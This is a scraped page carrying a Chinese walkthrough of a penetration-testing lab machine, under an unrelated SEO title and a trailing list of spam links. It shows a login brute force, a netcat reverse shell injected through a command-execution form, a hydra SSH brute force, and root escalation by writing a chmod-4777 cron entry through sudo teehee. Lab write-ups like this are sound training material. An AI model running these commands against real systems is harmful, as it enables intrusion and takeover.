当前位置: 首页 > news >正文

wordpress 投稿 标签百度排名优化

wordpress 投稿 标签,百度排名优化,网站为什么被k,做照片书的网站好文章目录 1. 靶场搭建2. 信息收集2.1 确定靶机ip2.2 主机信息收集2.3 主机目录探测 3. 渗透过程3.1 sql注入检测3.2 burp爆破3.3 反弹shell3.4 提权 4. 总结 1. 靶场搭建 靶场源地址 检验下载文件的检验码,对比没问题使用vmware打开 # windwos 命令 Get-FileHash …

文章目录

  • 1. 靶场搭建
  • 2. 信息收集
    • 2.1 确定靶机ip
    • 2.2 主机信息收集
    • 2.3 主机目录探测
  • 3. 渗透过程
    • 3.1 sql注入检测
    • 3.2 burp爆破
    • 3.3 反弹shell
    • 3.4 提权
  • 4. 总结

1. 靶场搭建

靶场源地址

检验下载文件的检验码,对比没问题使用vmware打开


# windwos 命令
Get-FileHash <filePath> -Algorithm MD5
# linux
md5sum filepath

2. 信息收集

2.1 确定靶机ip

根据虚拟机网络适配器模式,确定靶机所在网段。使用nmap进行网段存活主机,排除法确定靶机ip.

nmap -sn 192.168.6.100/24

1728460476155.png
通过排除法确定靶机ip为192.168.6.100

2.2 主机信息收集

通过nmap探测靶机开放端口和端口对应服务

nmap -Ap 1-65535  192.168.6.100

1728460685482.png

确定开放端口:

  • 22:ssh服务
  • 80: http服务

2.3 主机目录探测

import queue  
import requests  
import threading  
import urllib3  urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)  AGENT = "Mozilla/5.0 (X11; Linux x86_64; rv:19.0)Gecko/20100101 Firefox/19.0"  
# EXTENSIONS = ['.php', '.bak', '.orig', '.inc']  
TARGET = "http://192.168.6.100"  
THREADS = 8  
WORDLIST = "./all.txt"  words = queue.Queue  """  
读取字典文件,生成扫描内容  
"""  
def get_words(resume=None):  words = queue.Queue()  def extend_words(word):  if "." in word:  words.put(f"/{word}")  else:  words.put(f"/{word}/")  # for extension in EXTENSIONS:  #     words.put(f"/{word}{extension}")  with open(WORDLIST) as f:  raw_words = f.read()  found_resume = False  for word in raw_words.split():  if resume is not None:  if found_resume:  extend_words(word)  elif word == resume:  found_resume = True  else:  extend_words(word)  return words  """  
暴力扫描  
"""  
def dir_bruter(words):  headers = {"User-Agent":AGENT}  session = requests.Session()  session.verify = False  session.get(TARGET, headers = headers)  while not words.empty():  url = f"{TARGET}{words.get()}"  try:  r = session.get(url)  except requests.exceptions.ConnectionError as e:  # print(e)  continue  if r.status_code != 404:  print(url)  if __name__ == "__main__":  words = get_words()  for _ in range(THREADS):  t = threading.Thread(target=dir_bruter, args=(words,))  t.start()

1728463473503.png

3. 渗透过程

3.1 sql注入检测

访问web页面,发现只有一个登录界面.

1728463525123.png

尝试使用sqlmap进行sql注入点检测,发现不存在注入点。

sqlmap -u "http://192.168.6.100/login.php?username=admin&password=admin"

3.2 burp爆破

尝试使用burp进行弱密码爆破,由于账号和密码都不知道使用cluster boomb模式,选择爆破字典。

各种攻击模式的区别:

  • 【sinper】:对单一参数进行密码爆破
  • 【battering ram】:对所有参数进行同一个变量爆破(如用户名和密码一样)
  • 【pitchfork】:对所有参数进行一一对应爆破,传递两个参数两个字典,一一对应。
  • 【cluster bomb】:对参数进行交叉爆破,常用用于不知道账号密码的情况

image.png

cc05bb54-2410-4ba7-b3f3-1047dac1e697.jpeg

爆破成功,账号为admin,密码为happy,成功登录

fde44fda-6b9a-4f98-adb4-c911fd1beb6e.jpeg

3.3 反弹shell

发现网站存在功能可以直接让服务器直接前端请求执行的命令。修改请求包命令,进行反弹shell。
image.png

使用burp将请求拦截将参数radio改为nc -e /bin/sh 192.168.6.101 8888,kali使用nc进行监听

# 开启监听
nc -lvp 8888

image.png
1db55b3a-776b-46fe-8642-5f7d62ec7ad1.jpeg

反弹shell成功

# 创建一个伪终端,提高命令窗口交互
python -c 'import pty; pty.spawn("/bin/bash")'

3.4 提权

使用SUID进行提权

# 获取设置suid的文件 
find / -type f -perm -4000 2>/dev/null

image.png

发现/home/jim/test.sh文件,使用ls查看文件权限设置。查看文件内容之后,发现无法利用这个文件切换到jim用户.设置suid的文件在发生变更时,suid标志会被撤销,无果。

ls -l /home/jim/test.sh

d4450837-999a-4119-9d89-6a32c67b19d5.jpeg

尝试过sudo提权、搜索内核版本漏洞、crontab定时任务、/etc/passwd也没有发现利用的点。转变思路,在系统中查看是否有可利用的文件。

b83e8cbe-cdcd-4358-b246-4ac2d63278ea.jpeg

在jim目录下找到jim的旧密码记录文件,尝试进行ssh爆破。成功获取到密码jibril04.使用ssh成功登录。

# 使用hydra进行爆破
hydra -l jim -P dc4.txt ssh://192.168.6.100:22

41affc4f-0441-4231-854b-6bbb3d874615.jpeg

8949b23c-3776-495a-bdd3-8f5fb133a01d.jpeg

发现有一个邮件,查看cat /var/mail/jim获取邮件,获取到charles的密码,切换用户
82fd45d8-8619-45cf-8000-ebe2e37e250a.jpeg

切换用户之后继续尝试sudo提权,发现存在/usr/bin/teehee被设置为无密码使用。

# 获取teehee的帮助信息,了解这个命令
teehee --help

teehee是将标准输入写入到某个文件中的一个命令。

我们可以利用这个命令去写入一个定时任务,将/bin/bash权限设置为4777。

echo "* * * * * root chmod 4777 /bin/bash" | sudo teehee -a /etc/crontab

接下来执行/bin/bash,发现并没有提权,猜测受到环境变量或者配置文件的限制。采用/bin/bash -p进行尝试,-p参数使用保护模式启动,保护模式下会忽略一些环境变量和配置文件,成功提权。

7c063646-5726-4138-bd94-f2390ddd9fb9.jpeg

成功获取flag
d019b8a4-b9a1-4210-a031-af1e23543387.jpeg

4. 总结

本次靶场利用到的技能:

  • namp进行信息收集
  • burp suite利用字典进行账号密码爆破,篡改发送包参数。
  • hydra进行ssh字典密码爆破
  • sudo配合定时任务提权。
http://www.mmbaike.com/news/26081.html

相关文章:

  • 免费做旅游海报的网站网络营销策划书包括哪些内容
  • 免费的ai绘图网站有哪些企业seo顾问服务
  • 广州建造网站公司网站设计费用明细
  • 常用于网站推广的营销手段是长沙seo顾问
  • 视频直播免费网站建设百度投诉中心入口
  • 网站建设费seo优化诊断
  • wordpress国内几大主题名词解释搜索引擎优化
  • 东莞网站建设aj工作室营销网课
  • 企业网站优化怎么提高关键词排名百度推广账号出售
  • 做外贸网站那家专业百度云盘网页版
  • 做网站实现登陆功能百度浏览器手机版
  • 深圳宝安沙井网站建设常州seo排名收费
  • 网站 html谷歌浏览器app下载
  • 武汉app网站建设绍兴网站快速排名优化
  • 开原铁岭网站建设百度人工客服电话是多少
  • 网络设计师培训平台网站推广怎么优化
  • 宁乡电商网站建设报价大连百度网站排名优化
  • 颍泉网站建设网站建设哪家公司好
  • 税务咨询厦门seo外包公司
  • 文本网站代码空两格怎么做seo推广岗位职责
  • 网站建设需要的技术设备成都网站优化seo
  • 已认证网站服务费怎么做官方网站百度一下
  • 做母婴的网站有哪些石家庄关键词优化软件
  • wordpress能做手机站吗百度app下载最新版
  • 绍兴做网站建设顺德搜索seo网络推广
  • 浏览有关小城镇建设的网站记录关键词竞价排名
  • 青岛疫情最新数据武汉网站seo服务
  • 新手什么网站做外贸淘宝关键词搜索
  • wordpress微信编辑器搜索引擎seo关键词优化方法
  • 上海网站开发服务商好搜自然seo